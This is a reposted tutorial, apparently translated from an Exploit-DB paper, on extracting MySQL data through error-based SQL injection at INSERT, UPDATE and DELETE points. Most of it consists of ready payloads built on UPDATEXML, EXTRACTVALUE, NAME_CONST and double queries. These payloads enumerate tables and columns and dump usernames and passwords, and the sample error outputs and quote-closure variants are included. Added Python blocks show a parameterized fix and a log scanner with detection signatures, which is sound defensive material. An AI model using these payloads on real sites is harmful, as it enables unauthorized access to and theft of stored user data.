Fetching data using insert,update and delete injections

Source: Internet
Author: User

0x00 About

The techniques for obtaining database data through SQL injection can be broadly divided into UNION-based, error-based, Boolean-based blind and time-based blind injection, and they are usually discussed for an injection point inside a SELECT statement. So when we find an injection point inside an INSERT, UPDATE or DELETE statement (for example, some sites record user browsing data such as Referer, CLIENT_IP and User-Agent, and functions like user registration, password change and record deletion also write to the database), can the methods above still be used to get the data we need? Here we take MySQL as the example and look at how to get the data we want from INSERT, UPDATE and DELETE injection points.

0x01 Environment setup

To better demonstrate the injection effect, we first create the initial data with the following statements:

CREATE DATABASE newdb;
USE newdb;
CREATE TABLE users (id INT(3) NOT NULL AUTO_INCREMENT, username VARCHAR(20) NOT NULL, password VARCHAR(20) NOT NULL, PRIMARY KEY (id));
INSERT INTO users VALUES (1, 'Jane', 'Eyre');

(The VARCHAR lengths are not legible in the source; 20 is assumed here.)

Take a look at the current data structure:

0x02 Injection syntax

Because we are using the error-based approach here, the idea is to construct a syntax error inside the INSERT, UPDATE or DELETE statement, using statements of the following form:

INSERT INTO users (id, username, password) VALUES (2, 'inject here', 'Olivia');
INSERT INTO users (id, username, password) VALUES (2, "inject here", 'Olivia');

Note: in the username field we fill in 'inject here' and "inject here", two variants used to trigger the error: one is enclosed in single quotes, the other in double quotes. The payload has to be constructed to match the quoting at the actual injection point.
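To show where this quote closure comes from on the application side, here is an added example (not code from the original article): a Python visit logger that splices the Referer header into an INSERT, beside the parameterized form. SQLite stands in for MySQL, so the concatenated statement fails with SQLite's unknown-function error rather than MySQL's XPath error, but in both cases the header has reached the SQL parser as syntax; the table and function names are assumed for the demonstration.

```python
import sqlite3

# Constructed payload in the shape the article uses: close the string literal,
# append an error-based expression, then reopen the literal.
PAYLOAD = "' or updatexml(1,concat(0x7e,(version())),0) or '"


def build_unsafe_insert(referer: str, client_ip: str) -> str:
    """Vulnerable pattern: the Referer header is spliced into the SQL text."""
    return ("INSERT INTO visits (referer, client_ip) VALUES ('"
            + referer + "', '" + client_ip + "')")


def record_visit_unsafe(conn: sqlite3.Connection, referer: str, client_ip: str) -> str:
    """Run the concatenated statement; return 'stored' or the database error text."""
    try:
        conn.execute(build_unsafe_insert(referer, client_ip))
        return "stored"
    except sqlite3.Error as exc:
        # The payload was parsed as SQL: the engine complains about it, not about the data.
        return "error: " + str(exc)


def record_visit_safe(conn: sqlite3.Connection, referer: str, client_ip: str) -> str:
    """Hardened form: bound parameters keep the header a plain value, whatever it contains."""
    conn.execute("INSERT INTO visits (referer, client_ip) VALUES (?, ?)",
                 (referer, client_ip))
    return "stored"


def stored_referers(conn: sqlite3.Connection) -> list:
    """Read back what actually landed in the table."""
    return [row[0] for row in conn.execute("SELECT referer FROM visits ORDER BY rowid")]


def demo() -> tuple:
    """Feed the same payload through both paths against an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (referer TEXT NOT NULL, client_ip TEXT NOT NULL)")
    unsafe = record_visit_unsafe(conn, PAYLOAD, "10.0.0.1")
    safe = record_visit_safe(conn, PAYLOAD, "10.0.0.1")
    return unsafe, safe, stored_referers(conn)


if __name__ == "__main__":
    print(demo())
```

The parameterized path stores the payload verbatim as a string, which is exactly what a logging feature should do with an untrusted header.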

0x03 Using UPDATEXML() to get data

UPDATEXML() is one of MySQL's XPath functions for querying and modifying XML document data. When the XPath expression it is given is invalid, MySQL raises an error whose message echoes that expression, which is what returns the data.

Payload:

or updatexml(1,concat(0x7e,(version())),0) or

Insert:

INSERT INTO users (id, username, password) VALUES (2, 'Olivia' or updatexml(1,concat(0x7e,(version())),0) or '', 'Nervo');

Update:

UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or '' WHERE id=2 AND username='Olivia';

Delete:

DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or '';

Extract data:

Due to limited space, I will only use INSERT as the example, since the INSERT, UPDATE and DELETE usages are the same.

The payload used is:

or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)),0) or

Get newdb database table name:

Get the column name of the users table:

Use Insert to get data from the users table:

Use Delete to get data from the users table:

We can get the table names and column names with INSERT, UPDATE and DELETE statements, but we cannot get the data of the current table with UPDATE, because MySQL does not allow a subquery in an UPDATE to read from the table being updated:

Here, to demonstrate getting data with UPDATE, we temporarily create a students table with the columns id, name and address and insert one row:

Use UPDATE again to get the data from the users table:

If you run into an UPDATE injection and want to get the data from the current table, you can use a double query, which I will cover later.

0x04 Using EXTRACTVALUE() to get data

EXTRACTVALUE() is likewise one of MySQL's XPath functions for querying and modifying XML document data, and an invalid XPath expression produces the same kind of error message.

Payload:

or extractvalue(1,concat(0x7e,database())) or

Insert:

INSERT INTO users (id, username, password) VALUES (2, 'Olivia' or extractvalue(1,concat(0x7e,database())) or '', 'Nervo');

Update:

UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or '' WHERE id=2 AND username='Nervo';

Delete:

DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or '';

Extract data:

Similarly, since the INSERT, UPDATE and DELETE usages are the same, I will only use INSERT as the example.

Get newdb database table name:

INSERT INTO users (id, username, password) VALUES (2, 'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1))) or '', 'Nervo');

Get the column name of the users table:

INSERT INTO users (id, username, password) VALUES (2, 'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' LIMIT 0,1))) or '', 'Nervo');

Get data for the users table:

INSERT INTO users (id, username, password) VALUES (2, 'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat_ws(':',id,username,password) FROM users LIMIT 0,1))) or '', 'Nervo');

Similarly, we can use INSERT, UPDATE and DELETE statements to get the table names and column names, but cannot use UPDATE to get the data of the current table.

0x05 Using NAME_CONST() to get data

NAME_CONST() is available since MySQL 5.0.12 and returns the value it is given. When used to produce a result-set column, NAME_CONST() causes the column to take the given name.

Payload:

or (SELECT * FROM (SELECT name_const(version(),1), name_const(version(),1)) a) or

Insert:

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT * FROM (SELECT name_const(version(),1), name_const(version(),1)) a) or '', 'Nervo');

Update:

UPDATE users SET password='Nicky' or (SELECT * FROM (SELECT name_const(version(),1), name_const(version(),1)) a) or '' WHERE id=2 AND username='Nervo';

Delete:

DELETE FROM users WHERE id=1 or (SELECT * FROM (SELECT name_const(version(),1), name_const(version(),1)) a) or '';

Extract data:

In current MySQL versions, NAME_CONST() can only be used to extract the version string. In some older versions at or above 5.0.12 (5.0.12 included), more data can be extracted. Here I use MySQL 5.0.45 for the demonstration.

First, let's try a simple SELECT subquery to check whether data can be extracted at all.

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT * FROM (SELECT name_const((SELECT 2),1), name_const((SELECT 2),1)) a) or '', 'Nervo');

If ERROR 1210 (HY000): Incorrect arguments to NAME_CONST is displayed, give up; this version does not allow it.

If ERROR 1060 (42S21): Duplicate column name '2' is displayed, further data can be obtained.

Get newdb database table name:

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT * FROM (SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1), name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1)) a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name 'users'

Get the column name of the users table:

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT * FROM (SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),1), name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),1)) a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name 'id'

Get data for the users table:

INSERT INTO users (id, username, password) VALUES (2, 'Olivia' or (SELECT * FROM (SELECT name_const((SELECT concat_ws(0x7e,id,username,password) FROM users LIMIT 0,1),1), name_const((SELECT concat_ws(0x7e,id,username,password) FROM users LIMIT 0,1),1)) a) or '', 'Nervo');
ERROR 1060 (42S21): Duplicate column name '1~jane~eyre'

0x06 Using subquery (double query) injection

The principle is the same as error-based (double query) injection in SELECT statements: grouping by a key that combines the selected value with floor(rand(0)*2) produces a duplicate-entry error whose message contains that value.

Insert:

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM (SELECT COUNT(*), concat((SELECT (SELECT concat(0x7e,0x27,cast(database() AS char),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.columns GROUP BY x) a) or '', 'Nervo');

Update:

UPDATE users SET password='Nicky' or (SELECT 1 FROM (SELECT COUNT(*), concat((SELECT concat(0x7e,0x27,cast(database() AS char),0x27,0x7e) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.columns GROUP BY x) a) or '' WHERE id=2 AND username='Nervo';

Delete:

DELETE FROM users WHERE id=1 or (SELECT 1 FROM (SELECT COUNT(*), concat((SELECT (SELECT concat(0x7e,0x27,cast(database() AS char),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.columns GROUP BY x) a) or '';

Extract data:

Get newdb database table name:

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM (SELECT COUNT(*), concat((SELECT (SELECT DISTINCT concat(0x7e,0x27,cast(table_name AS char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.columns GROUP BY x) a) or '', 'Nervo');

Get the column name of the users table:

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM (SELECT COUNT(*), concat((SELECT (SELECT DISTINCT concat(0x7e,0x27,cast(column_name AS char),0x27,0x7e) FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 0,1) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.columns GROUP BY x) a) or '', 'Nervo');

Get data for the users table:

INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM (SELECT COUNT(*), concat((SELECT (SELECT concat(0x7e,0x27,cast(users.username AS char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.columns GROUP BY x) a) or '', 'Nervo');

0x07 More closure variants

Here (payload) stands for any of the expressions above; the surrounding quotes and operators are chosen to match the quoting at the injection point:

' or (payload) or '
' and (payload) and '
' or (payload) and '
' or (payload) and '='
' * (payload) * '
' or (payload) and '
" - (payload) - "
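From the defender's side, the payload families in 0x03 through 0x07 share a few stable features (the XPath and NAME_CONST function names, the floor(rand(0)*2) grouping key, information_schema lookups, and a quote immediately followed by a boolean operator), and the Referer and User-Agent fields mentioned in 0x00 are where they arrive. The following added example (not from the original article) is Python detection logic run over access-log lines; the log lines, field names and signature list are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the error-based payload families described above (constructed list).
SIGNATURES = {
    "updatexml":    re.compile(r"updatexml\s*\(", re.I),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    "name_const":   re.compile(r"name_const\s*\(", re.I),
    "double_query": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "schema_probe": re.compile(r"information_schema\.(?:tables|columns)", re.I),
}
# A quote immediately followed by a boolean operator: the string literal was closed
# and an expression appended, as in the closure variants listed above.
QUOTE_CLOSURE = re.compile(r"""['"]\s*(?:or|and)\b""", re.I)


def classify(field: str) -> list:
    """Return the signature names matched by one header value (URL-decoded first)."""
    decoded = unquote_plus(field)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if hits and QUOTE_CLOSURE.search(decoded):
        hits.append("quote_closure")
    return hits


# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" (?P<status>\d{3}) \S+ '
                    r'"(?P<referer>.*?)" "(?P<ua>.*?)"$')


def scan_log(lines) -> list:
    """Return (ip, status, field, hits) for each line whose Referer or User-Agent matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("referer", "ua"):
            hits = classify(m.group(field))
            if hits:
                findings.append((m.group("ip"), int(m.group("status")), field, hits))
    return findings


def log_line(ip, status, referer, ua) -> str:
    """Build a constructed access-log line for the demonstration."""
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET /page HTTP/1.1" '
            f'{status} 512 "{referer}" "{ua}"')


SAMPLE_LOG = [  # constructed sample; the last line carries the payload in User-Agent
    log_line("10.0.0.5", 200, "http://example.com/", "Mozilla/5.0"),
    log_line("10.0.0.7", 500, "' or updatexml(1,concat(0x7e,(version())),0) or '", "Mozilla/5.0"),
    log_line("10.0.0.8", 500, "http://example.com/",
             "' or (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x "
             "from information_schema.columns group by x)a) or '"),
]
```

A 500 status paired with one of these hits is the typical trace of error-based injection, since the technique works only when the database error surfaces.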

From: http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf

Transferred from: http://drops.wooyun.org/tips/2078
